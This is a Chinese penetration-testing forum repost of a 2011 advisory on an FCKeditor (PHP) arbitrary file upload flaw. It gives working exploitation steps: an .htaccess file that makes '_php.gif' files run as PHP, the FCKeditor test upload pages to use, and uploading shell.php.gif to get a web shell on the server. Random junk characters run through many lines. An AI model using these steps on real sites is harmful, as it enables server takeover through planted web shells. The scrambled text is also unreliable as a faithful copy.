中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]

作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞' B$ B, \  W: [8 p% q# J
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07( e* a9 k& E  S! {/ z+ ?) I6 ?! ]
减小字体 增大字体9 O! m; j1 M, [8 P
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability: ~9 ]0 b/ @- ^. m" A
[+] Date: 2011
2 V' J, I% X8 E! T8 I5 M2 V[+] Author : sinesafe.cn) `+ v; o! a# u4 Y
[+] Website : WwW.sinesafe.cn
5 u4 L& X6 x- \3 W- }———————————————————3 z& ^9 e, ?9 X$ }7 e8 w/ F
1.create a htaccess file:/ V- {) \& q9 V1 ?* L
code:
' C# [4 R/ r5 [5 f<FilesMatch “_php.gif”>6 _/ y1 D  ]$ s+ U( I* G
SetHandler application/x-httpd-php$ Q) p$ `: K$ S# l
</FilesMatch>
$ k1 r7 x" }6 A/ D/ w2 E# A
/ a  [9 O  E* ~: ?0 q0 x4 b) g2.Now upload this htaccess with FCKeditor.
" _0 @$ y: h6 O5 Q; r/ V% G0 y! a" U2 e1 F4 c3 P8 [, L, Q
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html+ G# R8 k; h1 y' x
' |! O, M" `2 t0 }' Z% [
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
% l& Z7 N5 k% g; `8 o# D7 a8 D4 N
& t8 [2 P8 R8 @3 j' V———————————————————————————————-/ ~. e* J, n+ h' A: |
3.Now upload shell.php.gif with FCKeditor.& n# H* e, c0 k1 ?& r- `/ i
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.9 F- C/ l) ~3 q6 p7 j- A$ j
5.http://www.sinesafe.cn/anything/shell_php.gif
5 n0 V# K  g9 S6 Q2 b6.Now shell is available from server.
9 q% n9 }3 N: v

6 G+ ?" ?$ A: n& v. Y6 |
2 ]! k7 W3 G  Z4 W+ t6 T




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2